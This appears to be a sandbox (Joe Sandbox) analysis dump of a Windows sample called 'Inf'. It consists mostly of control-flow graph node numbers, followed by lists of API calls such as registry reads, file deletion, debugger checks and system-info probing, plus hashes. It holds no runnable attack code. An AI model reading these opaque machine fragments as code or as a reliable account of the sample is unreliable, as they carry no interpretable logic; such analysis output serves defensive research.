96951 6f56f0 96949->96951 96952 6fbed9 8 API calls 96950->96952 96953 6facc0 8 API calls 96951->96953 96954 734daa 96952->96954 96955 6f56fe 96953->96955 96998 6fbd57 96954->96998 96957 6fadf4 8 API calls 96955->96957 96958 6f5708 96957->96958 96959 6facc0 8 API calls 96958->96959 96961 6f5733 96958->96961 96962 6f5729 96959->96962 96960 6f5778 96964 6facc0 8 API calls 96960->96964 96961->96960 96963 6f5754 96961->96963 96969 734dcc 96961->96969 96966 6fadf4 8 API calls 96962->96966 96963->96960 96995 6f655e 96963->96995 96965 6f5789 96964->96965 96967 6f579f 96965->96967 96973 6fbed9 8 API calls 96965->96973 96966->96961 96970 6f57b3 96967->96970 96975 6fbed9 8 API calls 96967->96975 97004 6f8577 96969->97004 96974 6f57be 96970->96974 96977 6fbed9 8 API calls 96970->96977 96973->96967 96978 6fbed9 8 API calls 96974->96978 96980 6f57c9 96974->96980 96975->96970 96976 6facc0 8 API calls 96976->96960 96977->96974 96978->96980 96979 734e8c 96979->96960 96981 6f655e 8 API calls 96979->96981 97016 6fad40 8 API calls __fread_nolock 96979->97016 96980->96934 96981->96979 96984 6f7bc7 96983->96984 96985 73641d 96983->96985 97018 6f7bd8 96984->97018 97028 7513c8 8 API calls __fread_nolock 96985->97028 96988 6f7bd3 96988->96934 96989 736427 96990 736433 96989->96990 96991 6fbed9 8 API calls 96989->96991 96991->96990 96992->96934 96993->96936 96994->96940 96996 6fc2c9 8 API calls 96995->96996 96997 6f5761 96996->96997 96997->96960 96997->96976 96999 6fbd64 96998->96999 97000 6fbd71 96998->97000 96999->96961 97001 71014b 8 API calls 97000->97001 97002 6fbd7b 97001->97002 97003 71017b 8 API calls 97002->97003 97003->96999 97005 736610 97004->97005 97006 6f8587 _wcslen 97004->97006 97007 6fadf4 8 API calls 97005->97007 97009 6f859d 97006->97009 97010 6f85c2 97006->97010 97008 736619 97007->97008 97008->97008 97017 6f88e8 8 API calls 97009->97017 97012 71014b 8 API calls 97010->97012 97014 6f85ce 97012->97014 97013 6f85a5 __fread_nolock 97013->96979 97015 71017b 8 API calls 
97014->97015 97015->97013 97016->96979 97017->97013 97019 6f7c1b __fread_nolock 97018->97019 97020 6f7be7 97018->97020 97019->96988 97020->97019 97021 73644e 97020->97021 97022 6f7c0e 97020->97022 97023 71014b 8 API calls 97021->97023 97029 6f7d74 97022->97029 97025 73645d 97023->97025 97026 71017b 8 API calls 97025->97026 97027 736491 __fread_nolock 97026->97027 97028->96989 97030 6f7d8a 97029->97030 97033 6f7d85 __fread_nolock 97029->97033 97031 736528 97030->97031 97032 71017b 8 API calls 97030->97032 97032->97033 97033->97019 97068 7602aa 97034->97068 97037 7603f3 97084 7605e9 56 API calls __fread_nolock 97037->97084 97039 760471 97041 760507 97039->97041 97042 7604a1 97039->97042 97059 760399 __fread_nolock 97039->97059 97040 76040b 97040->97039 97043 76041b 97040->97043 97047 7605b0 97041->97047 97048 760510 97041->97048 97045 7604a6 97042->97045 97046 7604d1 97042->97046 97044 760453 97043->97044 97085 762855 10 API calls 97043->97085 97075 761844 97044->97075 97045->97059 97088 6fca5b 39 API calls 97045->97088 97046->97059 97089 6fca5b 39 API calls 97046->97089 97047->97059 97093 6fc63f 39 API calls 97047->97093 97049 760515 97048->97049 97050 76058d 97048->97050 97052 760554 97049->97052 97053 76051b 97049->97053 97050->97059 97092 6fc63f 39 API calls 97050->97092 97052->97059 97091 6fc63f 39 API calls 97052->97091 97053->97059 97090 6fc63f 39 API calls 97053->97090 97059->96649 97061 760427 97086 762855 10 API calls 97061->97086 97064 76043e __fread_nolock 97087 762855 10 API calls 97064->97087 97066->96647 97067->96646 97069 7602f7 97068->97069 97071 7602bb 97068->97071 97104 6fc98d 39 API calls 97069->97104 97072 7602f5 97071->97072 97073 6f8ec0 52 API calls 97071->97073 97094 714d98 97071->97094 97072->97037 97072->97040 97072->97059 97073->97071 97076 76184f 97075->97076 97077 71014b 8 API calls 97076->97077 97078 761856 97077->97078 97079 761862 97078->97079 97080 761883 97078->97080 97081 71017b 8 API calls 97079->97081 97082 71017b 8 API calls 
97080->97082 97083 76186b ___scrt_fastfail 97081->97083 97082->97083 97083->97059 97084->97059 97085->97061 97086->97064 97087->97044 97088->97059 97089->97059 97090->97059 97091->97059 97092->97059 97093->97059 97095 714da6 97094->97095 97096 714e1b 97094->97096 97103 714dcb 97095->97103 97105 71f649 20 API calls __dosmaperr 97095->97105 97107 714e2d 40 API calls 3 library calls 97096->97107 97098 714e28 97098->97071 97100 714db2 97106 722b5c 26 API calls pre_c_initialization 97100->97106 97102 714dbd 97102->97071 97103->97071 97104->97072 97105->97100 97106->97102 97107->97098 97108->96651 97109->96656 97111 71014b 8 API calls 97110->97111 97112 6f424e 97111->97112 97112->96663 97113->96666 97115 6fbf73 8 API calls 97114->97115 97116 75dc73 97115->97116 97117 6fbf73 8 API calls 97116->97117 97118 75dc7c 97117->97118 97119 6fbf73 8 API calls 97118->97119 97120 75dc85 97119->97120 97138 6f5851 97120->97138 97125 75dcab 97126 6f568e 8 API calls 97125->97126 97128 75dcbf FindFirstFileW 97126->97128 97127 6f6b7c 8 API calls 97127->97125 97129 75dd4b FindClose 97128->97129 97132 75dcde 97128->97132 97134 75dd56 97129->97134 97130 75dd26 FindNextFileW 97130->97132 97131 6fbed9 8 API calls 97131->97132 97132->97129 97132->97130 97132->97131 97133 6f7bb5 8 API calls 97132->97133 97150 6f6b7c 97132->97150 97133->97132 97134->96671 97137 75dd42 FindClose 97137->97134 97159 7322d0 97138->97159 97141 6f587d 97143 6f8577 8 API calls 97141->97143 97142 6f5898 97144 6fbd57 8 API calls 97142->97144 97145 6f5889 97143->97145 97144->97145 97161 6f55dc 97145->97161 97148 75eab0 GetFileAttributesW 97149 75dc99 97148->97149 97149->97125 97149->97127 97151 6f6b93 97150->97151 97152 7357fe 97150->97152 97165 6f6ba4 97151->97165 97154 71014b 8 API calls 97152->97154 97156 735808 _wcslen 97154->97156 97155 6f6b9e DeleteFileW 97155->97130 97155->97137 97157 71017b 8 API calls 97156->97157 97158 735841 __fread_nolock 97157->97158 97160 6f585e GetFullPathNameW 97159->97160 97160->97141 
97160->97142 97162 6f55ea 97161->97162 97163 6fadf4 8 API calls 97162->97163 97164 6f55fe 97163->97164 97164->97148 97166 6f6bb4 _wcslen 97165->97166 97167 735860 97166->97167 97168 6f6bc7 97166->97168 97169 71014b 8 API calls 97167->97169 97170 6f7d74 8 API calls 97168->97170 97172 73586a 97169->97172 97171 6f6bd4 __fread_nolock 97170->97171 97171->97155 97173 71017b 8 API calls 97172->97173 97174 73589a __fread_nolock 97173->97174 97176 71017b 8 API calls 97175->97176 97177 70c209 97176->97177 97178 71014b 8 API calls 97177->97178 97179 70c215 97178->97179 97179->96683 97181 70fa35 97180->97181 97182 70f9fe 97180->97182 97191 70fe8a 8 API calls 97181->97191 97184 71017b 8 API calls 97182->97184 97185 70fa05 WideCharToMultiByte 97184->97185 97190 70fa3e 8 API calls __fread_nolock 97185->97190 97187 70fa29 97187->96687 97188->96680 97189->96684 97190->97187 97191->97187 97193 6f3996 ___scrt_fastfail 97192->97193 97214 6f5f32 97193->97214 97196 6f3a1c 97198 6f3a3a Shell_NotifyIconW 97196->97198 97199 7340cd Shell_NotifyIconW 97196->97199 97218 6f61a9 97198->97218 97201 6f3a50 97201->96714 97203 6f3969 97202->97203 97204 6f3919 ___scrt_fastfail 97202->97204 97203->96714 97205 6f3938 Shell_NotifyIconW 97204->97205 97205->97203 97206->96714 97208 71017b 8 API calls 97207->97208 97209 6f7afa 97208->97209 97210 71014b 8 API calls 97209->97210 97211 6f7b08 97210->97211 97211->96714 97212->96714 97213->96714 97215 6f5f4e 97214->97215 97216 6f39eb 97214->97216 97215->97216 97217 735070 DestroyIcon 97215->97217 97216->97196 97248 75d11f 42 API calls 97216->97248 97217->97216 97219 6f61c6 97218->97219 97238 6f62a8 97218->97238 97220 6f7ad5 8 API calls 97219->97220 97221 6f61d4 97220->97221 97222 735278 LoadStringW 97221->97222 97223 6f61e1 97221->97223 97226 735292 97222->97226 97224 6f8577 8 API calls 97223->97224 97225 6f61f6 97224->97225 97227 6f6203 97225->97227 97233 7352ae 97225->97233 97229 6fbed9 8 API calls 97226->97229 97231 6f6229 ___scrt_fastfail 97226->97231 
97227->97226 97228 6f620d 97227->97228 97230 6f6b7c 8 API calls 97228->97230 97229->97231 97232 6f621b 97230->97232 97236 6f628e Shell_NotifyIconW 97231->97236 97234 6f7bb5 8 API calls 97232->97234 97233->97231 97235 7352f1 97233->97235 97237 6fbf73 8 API calls 97233->97237 97234->97231 97250 70fe6f 51 API calls 97235->97250 97236->97238 97239 7352d8 97237->97239 97238->97201 97249 75a350 9 API calls 97239->97249 97242 735310 97244 6f6b7c 8 API calls 97242->97244 97243 7352e3 97245 6f7bb5 8 API calls 97243->97245 97246 735321 97244->97246 97245->97235 97247 6f6b7c 8 API calls 97246->97247 97247->97231 97248->97196 97249->97243 97250->97242 97252 7618b6 97251->97252 97253 71014b 8 API calls 97252->97253 97254 7618bd 97253->97254 97257 75fcb5 97254->97257 97256 7618f7 97256->96726 97258 6fc2c9 8 API calls 97257->97258 97259 75fcc8 CharLowerBuffW 97258->97259 97262 75fcdb 97259->97262 97260 6f655e 8 API calls 97260->97262 97261 75fce5 ___scrt_fastfail 97261->97256 97262->97260 97262->97261 97263 75fd19 97262->97263 97264 75fd2b 97263->97264 97265 6f655e 8 API calls 97263->97265 97266 71017b 8 API calls 97264->97266 97265->97264 97270 75fd59 97266->97270 97269 75fdb8 97269->97261 97272 71014b 8 API calls 97269->97272 97271 75fd7b 97270->97271 97290 75fbed 8 API calls 97270->97290 97275 75fe0c 97271->97275 97273 75fdd2 97272->97273 97274 71017b 8 API calls 97273->97274 97274->97261 97276 6fbf73 8 API calls 97275->97276 97277 75fe3e 97276->97277 97278 6fbf73 8 API calls 97277->97278 97279 75fe47 97278->97279 97280 6fbf73 8 API calls 97279->97280 97287 75fe50 97280->97287 97281 760114 97281->97269 97282 6fad40 8 API calls 97282->97287 97283 7166f8 GetStringTypeW 97283->97287 97284 6f8577 8 API calls 97284->97287 97286 75fe0c 40 API calls 97286->97287 97287->97281 97287->97282 97287->97283 97287->97284 97287->97286 97288 716641 39 API calls 97287->97288 97289 6fbed9 8 API calls 97287->97289 97291 716722 GetStringTypeW 97287->97291 97288->97287 97289->97287 97290->97270 
97291->97287 97292->96758 97293->96744 97294->96758 97295->96759 97296->96758 97297->96604 97298->96604 97299->96601 97300->96607 97318 6fcf80 97301->97318 97303 6fbfb5 97304 740db6 97303->97304 97305 6fbfc3 97303->97305 97327 6fb4c8 8 API calls 97304->97327 97307 71014b 8 API calls 97305->97307 97308 6fbfd4 97307->97308 97310 6fbf73 8 API calls 97308->97310 97309 740dc1 97311 6fbfde 97310->97311 97312 6fbfed 97311->97312 97313 6fbed9 8 API calls 97311->97313 97314 71014b 8 API calls 97312->97314 97313->97312 97315 6fbff7 97314->97315 97326 6fbe7b 39 API calls 97315->97326 97317 6fc01b 97317->96421 97319 6fd1c7 97318->97319 97324 6fcf93 97318->97324 97319->97303 97321 6fd03d 97321->97303 97322 6fbf73 8 API calls 97322->97324 97324->97321 97324->97322 97328 7105b2 5 API calls __Init_thread_wait 97324->97328 97329 710413 29 API calls __onexit 97324->97329 97330 710568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97324->97330 97326->97317 97327->97309 97328->97324 97329->97324 97330->97324 97331 6f1044 97336 6f2793 97331->97336 97333 6f104a 97372 710413 29 API calls __onexit 97333->97372 97335 6f1054 97373 6f2a38 97336->97373 97340 6f280a 97341 6fbf73 8 API calls 97340->97341 97342 6f2814 97341->97342 97343 6fbf73 8 API calls 97342->97343 97344 6f281e 97343->97344 97345 6fbf73 8 API calls 97344->97345 97346 6f2828 97345->97346 97347 6fbf73 8 API calls 97346->97347 97348 6f2866 97347->97348 97349 6fbf73 8 API calls 97348->97349 97350 6f2932 97349->97350 97383 6f2dbc 97350->97383 97354 6f2964 97355 6fbf73 8 API calls 97354->97355 97356 6f296e 97355->97356 97357 703160 9 API calls 97356->97357 97358 6f2999 97357->97358 97410 6f3166 97358->97410 97360 6f29b5 97361 6f29c5 GetStdHandle 97360->97361 97362 7339e7 97361->97362 97363 6f2a1a 97361->97363 97362->97363 97364 7339f0 97362->97364 97367 6f2a27 OleInitialize 97363->97367 97365 71014b 8 API calls 97364->97365 97366 7339f7 97365->97366 97417 760ac4 InitializeCriticalSectionAndSpinCount 
InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97366->97417 97367->97333 97369 733a00 97418 7612eb CreateThread 97369->97418 97371 733a0c CloseHandle 97371->97363 97372->97335 97419 6f2a91 97373->97419 97376 6f2a91 8 API calls 97377 6f2a70 97376->97377 97378 6fbf73 8 API calls 97377->97378 97379 6f2a7c 97378->97379 97380 6f8577 8 API calls 97379->97380 97381 6f27c9 97380->97381 97382 6f327e 6 API calls 97381->97382 97382->97340 97384 6fbf73 8 API calls 97383->97384 97385 6f2dcc 97384->97385 97386 6fbf73 8 API calls 97385->97386 97387 6f2dd4 97386->97387 97426 6f81d6 97387->97426 97390 6f81d6 8 API calls 97391 6f2de4 97390->97391 97392 6fbf73 8 API calls 97391->97392 97393 6f2def 97392->97393 97394 71014b 8 API calls 97393->97394 97395 6f293c 97394->97395 97396 6f3205 97395->97396 97397 6f3213 97396->97397 97398 6fbf73 8 API calls 97397->97398 97399 6f321e 97398->97399 97400 6fbf73 8 API calls 97399->97400 97401 6f3229 97400->97401 97402 6fbf73 8 API calls 97401->97402 97403 6f3234 97402->97403 97404 6fbf73 8 API calls 97403->97404 97405 6f323f 97404->97405 97406 6f81d6 8 API calls 97405->97406 97407 6f324a 97406->97407 97408 71014b 8 API calls 97407->97408 97409 6f3251 RegisterWindowMessageW 97408->97409 97409->97354 97411 6f3176 97410->97411 97412 733c8f 97410->97412 97413 71014b 8 API calls 97411->97413 97429 763c4e 8 API calls 97412->97429 97415 6f317e 97413->97415 97415->97360 97416 733c9a 97417->97369 97418->97371 97430 7612d1 14 API calls 97418->97430 97420 6fbf73 8 API calls 97419->97420 97421 6f2a9c 97420->97421 97422 6fbf73 8 API calls 97421->97422 97423 6f2aa4 97422->97423 97424 6fbf73 8 API calls 97423->97424 97425 6f2a66 97424->97425 97425->97376 97427 6fbf73 8 API calls 97426->97427 97428 6f2ddc 97427->97428 97428->97390 97429->97416 97431 6ff4c0 97434 70a025 97431->97434 97433 6ff4cc 97435 70a046 97434->97435 97436 70a0a3 97434->97436 97435->97436 97437 700340 207 API calls 97435->97437 97440 70a0e7 97436->97440 97443 763fe1 
81 API calls __wsopen_s 97436->97443 97441 70a077 97437->97441 97439 74806b 97439->97439 97440->97433 97441->97436 97441->97440 97442 6fbed9 8 API calls 97441->97442 97442->97436 97443->97439 97444 700ebf 97445 700ed3 97444->97445 97450 701425 97444->97450 97446 700ee5 97445->97446 97447 71014b 8 API calls 97445->97447 97448 74562c 97446->97448 97451 700f3e 97446->97451 97478 6fb4c8 8 API calls 97446->97478 97447->97446 97479 761b14 8 API calls 97448->97479 97450->97446 97454 6fbed9 8 API calls 97450->97454 97453 702b20 207 API calls 97451->97453 97468 70049d ISource 97451->97468 97476 700376 ISource 97453->97476 97454->97446 97455 74632b 97483 763fe1 81 API calls __wsopen_s 97455->97483 97457 701695 97463 6fbed9 8 API calls 97457->97463 97457->97468 97459 6fbed9 8 API calls 97459->97476 97460 745cdb 97467 6fbed9 8 API calls 97460->97467 97460->97468 97461 74625a 97482 763fe1 81 API calls __wsopen_s 97461->97482 97463->97468 97465 7105b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97465->97476 97466 701990 207 API calls 97466->97476 97467->97468 97469 6fbf73 8 API calls 97469->97476 97470 710413 29 API calls pre_c_initialization 97470->97476 97471 746115 97480 763fe1 81 API calls __wsopen_s 97471->97480 97472 700aae ISource 97481 763fe1 81 API calls __wsopen_s 97472->97481 97474 710568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97474->97476 97475 71014b 8 API calls 97475->97476 97476->97455 97476->97457 97476->97459 97476->97460 97476->97461 97476->97465 97476->97466 97476->97468 97476->97469 97476->97470 97476->97471 97476->97472 97476->97474 97476->97475 97477 701e50 40 API calls ISource 97476->97477 97477->97476 97478->97446 97479->97468 97480->97472 97481->97468 97482->97468 97483->97468 97484 728782 97489 72853e 97484->97489 97487 7287aa 97490 72856f try_get_first_available_module 97489->97490 97500 7286b8 97490->97500 97504 71917b 40 API calls 2 library calls 
97490->97504 97492 72876e 97508 722b5c 26 API calls pre_c_initialization 97492->97508 97494 7286c3 97494->97487 97501 730d04 97494->97501 97496 72870c 97496->97500 97505 71917b 40 API calls 2 library calls 97496->97505 97498 72872b 97498->97500 97506 71917b 40 API calls 2 library calls 97498->97506 97500->97494 97507 71f649 20 API calls __dosmaperr 97500->97507 97509 730401 97501->97509 97503 730d1f 97503->97487 97504->97496 97505->97498 97506->97500 97507->97492 97508->97494 97512 73040d BuildCatchObjectHelperInternal 97509->97512 97510 73041b 97567 71f649 20 API calls __dosmaperr 97510->97567 97512->97510 97514 730454 97512->97514 97513 730420 97568 722b5c 26 API calls pre_c_initialization 97513->97568 97520 7309db 97514->97520 97519 73042a __fread_nolock 97519->97503 97570 7307af 97520->97570 97523 730a26 97588 725594 97523->97588 97524 730a0d 97602 71f636 20 API calls __dosmaperr 97524->97602 97527 730a2b 97528 730a34 97527->97528 97529 730a4b 97527->97529 97604 71f636 20 API calls __dosmaperr 97528->97604 97601 73071a CreateFileW 97529->97601 97530 730a12 97603 71f649 20 API calls __dosmaperr 97530->97603 97534 730a39 97605 71f649 20 API calls __dosmaperr 97534->97605 97535 730478 97569 7304a1 LeaveCriticalSection __wsopen_s 97535->97569 97537 730b01 GetFileType 97538 730b53 97537->97538 97539 730b0c GetLastError 97537->97539 97610 7254dd 21 API calls 2 library calls 97538->97610 97608 71f613 20 API calls __dosmaperr 97539->97608 97540 730ad6 GetLastError 97607 71f613 20 API calls __dosmaperr 97540->97607 97542 730a84 97542->97537 97542->97540 97606 73071a CreateFileW 97542->97606 97544 730b1a CloseHandle 97544->97530 97546 730b43 97544->97546 97609 71f649 20 API calls __dosmaperr 97546->97609 97548 730ac9 97548->97537 97548->97540 97550 730b74 97552 730bc0 97550->97552 97611 73092b 72 API calls 3 library calls 97550->97611 97551 730b48 97551->97530 97556 730bed 97552->97556 97612 7304cd 72 API calls 3 library calls 97552->97612 97555 730be6 97555->97556 97557 
730bfe 97555->97557 97613 728a2e 97556->97613 97557->97535 97559 730c7c CloseHandle 97557->97559 97628 73071a CreateFileW 97559->97628 97561 730ca7 97562 730cdd 97561->97562 97563 730cb1 GetLastError 97561->97563 97562->97535 97629 71f613 20 API calls __dosmaperr 97563->97629 97565 730cbd 97630 7256a6 21 API calls 2 library calls 97565->97630 97567->97513 97568->97519 97569->97519 97571 7307d0 97570->97571 97572 7307ea 97570->97572 97571->97572 97638 71f649 20 API calls __dosmaperr 97571->97638 97631 73073f 97572->97631 97574 730822 97578 730851 97574->97578 97640 71f649 20 API calls __dosmaperr 97574->97640 97576 7307df 97639 722b5c 26 API calls pre_c_initialization 97576->97639 97585 7308a4 97578->97585 97642 71da7d 26 API calls 2 library calls 97578->97642 97581 73089f 97583 73091e 97581->97583 97581->97585 97582 730846 97641 722b5c 26 API calls pre_c_initialization 97582->97641 97643 722b6c 11 API calls _abort 97583->97643 97585->97523 97585->97524 97587 73092a 97589 7255a0 BuildCatchObjectHelperInternal 97588->97589 97646 7232d1 EnterCriticalSection 97589->97646 97591 7255ee 97647 72569d 97591->97647 97592 7255a7 97592->97591 97593 7255cc 97592->97593 97598 72563a EnterCriticalSection 97592->97598 97650 725373 97593->97650 97596 725617 __fread_nolock 97596->97527 97598->97591 97599 725647 LeaveCriticalSection 97598->97599 97599->97592 97601->97542 97602->97530 97603->97535 97604->97534 97605->97530 97606->97548 97607->97530 97608->97544 97609->97551 97610->97550 97611->97552 97612->97555 97614 725737 __wsopen_s 26 API calls 97613->97614 97617 728a3e 97614->97617 97615 728a44 97669 7256a6 21 API calls 2 library calls 97615->97669 97617->97615 97618 728a76 97617->97618 97621 725737 __wsopen_s 26 API calls 97617->97621 97618->97615 97619 725737 __wsopen_s 26 API calls 97618->97619 97622 728a82 CloseHandle 97619->97622 97620 728a9c 97623 728abe 97620->97623 97670 71f613 20 API calls __dosmaperr 97620->97670 97624 728a6d 97621->97624 97622->97615 97625 728a8e 
GetLastError 97622->97625 97623->97535 97627 725737 __wsopen_s 26 API calls 97624->97627 97625->97615 97627->97618 97628->97561 97629->97565 97630->97562 97632 730757 97631->97632 97633 730772 97632->97633 97644 71f649 20 API calls __dosmaperr 97632->97644 97633->97574 97635 730796 97645 722b5c 26 API calls pre_c_initialization 97635->97645 97637 7307a1 97637->97574 97638->97576 97639->97572 97640->97582 97641->97578 97642->97581 97643->97587 97644->97635 97645->97637 97646->97592 97658 723319 LeaveCriticalSection 97647->97658 97649 7256a4 97649->97596 97659 724ff0 97650->97659 97652 725392 97653 722d38 _free 20 API calls 97652->97653 97655 7253e4 97653->97655 97654 725385 97654->97652 97666 723778 11 API calls 2 library calls 97654->97666 97655->97591 97657 7254ba EnterCriticalSection 97655->97657 97657->97591 97658->97649 97664 724ffd __dosmaperr 97659->97664 97660 72503d 97668 71f649 20 API calls __dosmaperr 97660->97668 97661 725028 RtlAllocateHeap 97662 72503b 97661->97662 97661->97664 97662->97654 97664->97660 97664->97661 97667 71521d 7 API calls 2 library calls 97664->97667 97666->97654 97667->97664 97668->97662 97669->97620 97670->97623 97671 6fdd3d 97673 7419c2 97671->97673 97675 6fdd63 97671->97675 97672 741a46 97680 741a7d 97672->97680 97730 763fe1 81 API calls __wsopen_s 97672->97730 97673->97672 97677 741a82 97673->97677 97682 741a26 97673->97682 97674 6fdead 97679 71017b 8 API calls 97674->97679 97675->97674 97678 71014b 8 API calls 97675->97678 97731 763fe1 81 API calls __wsopen_s 97677->97731 97684 6fdd8d 97678->97684 97689 6fdee4 __fread_nolock 97679->97689 97729 70e6e8 207 API calls 97682->97729 97685 71014b 8 API calls 97684->97685 97684->97689 97686 6fdddb 97685->97686 97686->97682 97688 6fde16 97686->97688 97687 71017b 8 API calls 97687->97689 97690 700340 207 API calls 97688->97690 97689->97672 97689->97687 97691 6fde29 97690->97691 97691->97680 97691->97689 97692 741aa5 97691->97692 97693 6fde77 97691->97693 97695 6fd526 97691->97695 97732 
763fe1 81 API calls __wsopen_s 97692->97732 97693->97674 97693->97695 97696 71014b 8 API calls 97695->97696 97697 6fd589 97696->97697 97713 6fc32d 97697->97713 97700 71014b 8 API calls 97705 6fd66e ISource 97700->97705 97704 741f79 97734 7556ae 8 API calls ISource 97704->97734 97705->97704 97706 741f94 97705->97706 97708 6fbed9 8 API calls 97705->97708 97709 6fc3ab 8 API calls 97705->97709 97710 6fd911 ISource 97705->97710 97733 6fb4c8 8 API calls 97705->97733 97708->97705 97709->97705 97711 6fd9ac ISource 97710->97711 97720 6fc3ab 97710->97720 97712 6fd9c3 97711->97712 97728 70e30a 8 API calls ISource 97711->97728 97719 6fc33d 97713->97719 97714 6fc345 97714->97700 97715 71014b 8 API calls 97715->97719 97716 6fbf73 8 API calls 97716->97719 97717 6fbed9 8 API calls 97717->97719 97718 6fc32d 8 API calls 97718->97719 97719->97714 97719->97715 97719->97716 97719->97717 97719->97718 97721 6fc3b9 97720->97721 97727 6fc3e1 ISource 97720->97727 97722 6fc3c7 97721->97722 97723 6fc3ab 8 API calls 97721->97723 97724 6fc3cd 97722->97724 97725 6fc3ab 8 API calls 97722->97725 97723->97722 97724->97727 97735 6fc7e0 8 API calls ISource 97724->97735 97725->97724 97727->97711 97728->97711 97729->97672 97730->97680 97731->97680 97732->97680 97733->97705 97734->97706 97735->97727 97736 6ff4dc 97737 6fcab0 207 API calls 97736->97737 97738 6ff4ea 97737->97738 97739 6f105b 97744 6f52a7 97739->97744 97741 6f106a 97775 710413 29 API calls __onexit 97741->97775 97743 6f1074 97745 6f52b7 __wsopen_s 97744->97745 97746 6fbf73 8 API calls 97745->97746 97747 6f536d 97746->97747 97776 6f5594 97747->97776 97749 6f5376 97783 6f5238 97749->97783 97752 6f6b7c 8 API calls 97753 6f538f 97752->97753 97789 6f6a7c 97753->97789 97756 6fbf73 8 API calls 97757 6f53a7 97756->97757 97758 6fbd57 8 API calls 97757->97758 97759 6f53b0 RegOpenKeyExW 97758->97759 97760 734be6 RegQueryValueExW 97759->97760 97764 6f53d2 97759->97764 97761 734c03 97760->97761 97762 734c7c RegCloseKey 97760->97762 97763 71017b 8 API 
calls 97761->97763 97762->97764 97774 734c8e _wcslen 97762->97774 97765 734c1c 97763->97765 97764->97741 97766 6f423c 8 API calls 97765->97766 97767 734c27 RegQueryValueExW 97766->97767 97769 734c44 97767->97769 97771 734c5e ISource 97767->97771 97768 6f655e 8 API calls 97768->97774 97770 6f8577 8 API calls 97769->97770 97770->97771 97771->97762 97772 6fb329 8 API calls 97772->97774 97773 6f6a7c 8 API calls 97773->97774 97774->97764 97774->97768 97774->97772 97774->97773 97775->97743 97777 7322d0 __wsopen_s 97776->97777 97778 6f55a1 GetModuleFileNameW 97777->97778 97779 6fb329 8 API calls 97778->97779 97780 6f55c7 97779->97780 97781 6f5851 9 API calls 97780->97781 97782 6f55d1 97781->97782 97782->97749 97784 7322d0 __wsopen_s 97783->97784 97785 6f5245 GetFullPathNameW 97784->97785 97786 6f5267 97785->97786 97787 6f8577 8 API calls 97786->97787 97788 6f5285 97787->97788 97788->97752 97790 6f6a8b 97789->97790 97794 6f6aac __fread_nolock 97789->97794 97792 71017b 8 API calls 97790->97792 97791 71014b 8 API calls 97793 6f539e 97791->97793 97792->97794 97793->97756 97794->97791 97795 6f1098 97800 6f5fc8 97795->97800 97799 6f10a7 97801 6fbf73 8 API calls 97800->97801 97802 6f5fdf GetVersionExW 97801->97802 97803 6f8577 8 API calls 97802->97803 97804 6f602c 97803->97804 97805 6fadf4 8 API calls 97804->97805 97817 6f6062 97804->97817 97806 6f6056 97805->97806 97808 6f55dc 8 API calls 97806->97808 97807 6f611c GetCurrentProcess IsWow64Process 97809 6f6138 97807->97809 97808->97817 97811 735269 GetSystemInfo 97809->97811 97812 6f6150 LoadLibraryA 97809->97812 97810 735224 97813 6f619d GetSystemInfo 97812->97813 97814 6f6161 GetProcAddress 97812->97814 97816 6f6177 97813->97816 97814->97813 97815 6f6171 GetNativeSystemInfo 97814->97815 97815->97816 97818 6f617b FreeLibrary 97816->97818 97819 6f109d 97816->97819 97817->97807 97817->97810 97818->97819 97820 710413 29 API calls __onexit 97819->97820 97820->97799 97821 6f36f5 97824 6f370f 97821->97824 97825 6f3726 97824->97825 

Control-flow Graph
APIs
• GetVersionExW.KERNEL32(?), ref: 006F5FF7
  • Part of subcall function 006F8577: _wcslen.LIBCMT ref: 006F858A
• GetCurrentProcess.KERNEL32(?,0078DC2C,00000000,?,?), ref: 006F6123
• IsWow64Process.KERNEL32(00000000,?,?), ref: 006F612A
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 006F6155
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 006F6167
• GetNativeSystemInfo.KERNEL32(?,?,?), ref: 006F6175
• FreeLibrary.KERNEL32(00000000,?,?), ref: 006F617C
• GetSystemInfo.KERNEL32(?,?,?), ref: 006F61A1
Strings
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O
• API String ID: 3290436268-3101561225
• Opcode ID: 30baa67087110fe1af30e348672f9cee3c689770e64c7c42db283fe56b6b74ee
• Instruction ID: f8ae34fceeb9d43bcb8f9882c43914163a92ceb92ee14524e9140490755407ea
• Opcode Fuzzy Hash: 30baa67087110fe1af30e348672f9cee3c689770e64c7c42db283fe56b6b74ee
• Instruction Fuzzy Hash: 9EA1AF3291A2C8CFC712CBACBC459A53FA56B36300F18C99DE58097273D66D494ACB3D

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,006F3368,?), ref: 006F33BB
                                                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,006F3368,?), ref: 006F33CE
                                                                                                                                                                                                                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,007C2418,007C2400,?,?,?,?,?,?,006F3368,?), ref: 006F343A
                                                                                                                                                                                                                                                                                • Part of subcall function 006F8577: _wcslen.LIBCMT ref: 006F858A
                                                                                                                                                                                                                                                                                • Part of subcall function 006F425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,006F3462,007C2418,?,?,?,?,?,?,?,006F3368,?), ref: 006F42A0
